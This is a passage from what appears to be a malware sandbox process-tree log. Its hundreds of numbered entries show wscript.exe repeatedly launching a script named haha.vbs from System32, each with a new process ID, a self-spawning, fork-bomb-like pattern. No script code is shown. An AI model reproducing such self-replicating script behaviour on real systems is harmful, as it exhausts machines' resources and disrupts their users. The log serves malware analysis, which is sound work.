        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        540⤵
        
        PID:13404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        541⤵
        
        PID:17124
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        542⤵
        
        PID:13572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        543⤵
        
        PID:13616
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        544⤵
        
        PID:13760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        545⤵
        
        PID:13872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        546⤵
        
        PID:13988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        547⤵
        
        PID:20492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        548⤵
        
        PID:20576
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        549⤵
        
        PID:20636
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        550⤵
        
        PID:20700
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        551⤵
        
        PID:20764
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        552⤵
        
        PID:20832
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        553⤵
        
        PID:20880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        554⤵
        
        PID:20936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        555⤵
        
        PID:21008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        556⤵
        
        PID:21060
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        557⤵
        
        PID:21128
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        558⤵
        
        PID:21196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        559⤵
        
        PID:21268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        560⤵
        
        PID:21332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        561⤵
        
        PID:21400
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        562⤵
        
        PID:21456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        563⤵
        
        PID:17880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        564⤵
        
        PID:20556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        565⤵
        
        PID:9088
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        566⤵
        
        PID:20740
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        567⤵
        
        PID:3828
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        568⤵
        
        PID:20752
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        569⤵
        
        PID:5048
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        570⤵
        
        PID:21120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        571⤵
        
        PID:9640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        572⤵
        
        PID:21104
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        573⤵
        
        PID:21256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        574⤵
        
        PID:11216
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        575⤵
        
        PID:14464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        576⤵
        
        PID:21300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        577⤵
        
        PID:14588
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        578⤵
        
        PID:18640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        579⤵
        
        PID:21476
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        580⤵
        
        PID:10804
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        581⤵
        
        PID:18860
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        582⤵
        
        PID:14260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        583⤵
        
        PID:11056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        584⤵
        
        PID:5716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        585⤵
        
        PID:6088
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        586⤵
        
        PID:6016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        587⤵
        
        PID:15136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        588⤵
        
        PID:15196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        589⤵
        
        PID:15260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        590⤵
        
        PID:11496
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        591⤵
        
        PID:6600
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        592⤵
        
        PID:11636
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        593⤵
        
        PID:10800
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        594⤵
        
        PID:11856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        595⤵
        
        PID:12000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        596⤵
        
        PID:19304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        597⤵
        
        PID:6348
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        598⤵
        
        PID:6588
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        599⤵
        
        PID:11100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        600⤵
        
        PID:12448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        601⤵
        
        PID:15544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        602⤵
        
        PID:6808
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        603⤵
        
        PID:15668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        604⤵
        
        PID:11340
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        605⤵
        
        PID:1996
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        606⤵
        
        PID:4480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        607⤵
        
        PID:12692
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        608⤵
        
        PID:4264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        609⤵
        
        PID:19684
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        610⤵
        
        PID:15756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        611⤵
        
        PID:15864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        612⤵
        
        PID:7064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        613⤵
        
        PID:5656
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        614⤵
        
        PID:6688
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        615⤵
        
        PID:16052
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        616⤵
        
        PID:24076
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        617⤵
        
        PID:24184
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        618⤵
        
        PID:24248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        619⤵
        
        PID:24292
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        620⤵
        
        PID:24336
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        621⤵
        
        PID:24380
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        622⤵
        
        PID:24448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        623⤵
        
        PID:24496
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        624⤵
        
        PID:24552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        625⤵
        
        PID:20412
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        626⤵
        
        PID:15656
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        627⤵
        
        PID:7868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        628⤵
        
        PID:2240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        629⤵
        
        PID:16460
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        630⤵
        
        PID:19904
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        631⤵
        
        PID:13492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        632⤵
        
        PID:13520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        633⤵
        
        PID:13620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        634⤵
        
        PID:13356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        635⤵
        
        PID:13448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        636⤵
        
        PID:13824
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        637⤵
        
        PID:17024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        638⤵
        
        PID:10024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        639⤵
        
        PID:17188
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        640⤵
        
        PID:2908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        641⤵
        
        PID:24044
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        642⤵
        
        PID:24424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        643⤵
        
        PID:20552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        644⤵
        
        PID:10620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        645⤵
        
        PID:24524
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        646⤵
        
        PID:16756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        647⤵
        
        PID:20868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        648⤵
        
        PID:10384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        649⤵
        
        PID:13484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        650⤵
        
        PID:21044
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        651⤵
        
        PID:2748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        652⤵
        
        PID:9004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        653⤵
        
        PID:10372
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        654⤵
        
        PID:17792
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        655⤵
        
        PID:17920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        656⤵
        
        PID:16012
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        657⤵
        
        PID:18164
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        658⤵
        
        PID:17592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        659⤵
        
        PID:17740
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        660⤵
        
        PID:4048
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        661⤵
        
        PID:14436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        662⤵
        
        PID:21440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        663⤵
        
        PID:11200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        664⤵
        
        PID:11700
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        665⤵
        
        PID:18224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        666⤵
        
        PID:2576
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        667⤵
        
        PID:18456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        668⤵
        
        PID:11164
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        669⤵
        
        PID:18624
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        670⤵
        
        PID:6176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        671⤵
        
        PID:18880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        672⤵
        
        PID:11584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        673⤵
        
        PID:14472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        674⤵
        
        PID:19156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        675⤵
        
        PID:18500
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        676⤵
        
        PID:19240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        677⤵
        
        PID:24592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        678⤵
        
        PID:24636
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        679⤵
        
        PID:24704
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        680⤵
        
        PID:24760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        681⤵
        
        PID:24816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        682⤵
        
        PID:24872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        683⤵
        
        PID:24912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        684⤵
        
        PID:24956
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        685⤵
        
        PID:24992
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        686⤵
        
        PID:25032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        687⤵
        
        PID:25064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        688⤵
        
        PID:25112
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        689⤵
        
        PID:25152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        690⤵
        
        PID:25200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        691⤵
        
        PID:25232
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        692⤵
        
        PID:25276
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        693⤵
        
        PID:25320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        694⤵
        
        PID:25356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        695⤵
        
        PID:25404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        696⤵
        
        PID:25456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        697⤵
        
        PID:25500
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        698⤵
        
        PID:25544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        699⤵
        
        PID:25576
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        700⤵
        
        PID:19444
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        701⤵
        
        PID:18716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        702⤵
        
        PID:24664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        703⤵
        
        PID:18864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        704⤵
        
        PID:11228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        705⤵
        
        PID:24840
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        706⤵
        
        PID:16004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        707⤵
        
        PID:15872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        708⤵
        
        PID:11632
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        709⤵
        
        PID:6036
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        710⤵
        
        PID:13236
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        711⤵
        
        PID:12488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        712⤵
        
        PID:2544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        713⤵
        
        PID:15484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        714⤵
        
        PID:12856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        715⤵
        
        PID:1724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        716⤵
        
        PID:8908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        717⤵
        
        PID:16672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        718⤵
        
        PID:19948
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        719⤵
        
        PID:20012
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        720⤵
        
        PID:20108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        721⤵
        
        PID:19528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        722⤵
        
        PID:3684
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        723⤵
        
        PID:13644
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        724⤵
        
        PID:17376
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        725⤵
        
        PID:16536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        726⤵
        
        PID:11796
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        727⤵
        
        PID:19688
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        728⤵
        
        PID:19600
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        729⤵
        
        PID:19976
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        730⤵
        
        PID:17000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        731⤵
        
        PID:17012
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        732⤵
        
        PID:17744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        733⤵
        
        PID:4356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        734⤵
        
        PID:24224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        735⤵
        
        PID:14516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        736⤵
        
        PID:8536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        737⤵
        
        PID:25100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        738⤵
        
        PID:17424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        739⤵
        
        PID:20924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        740⤵
        
        PID:20624
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        741⤵
        
        PID:14360
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        742⤵
        
        PID:10188
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        743⤵
        
        PID:20908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        744⤵
        
        PID:2752
        
        C:\Windows\System32\wscript.exe
        
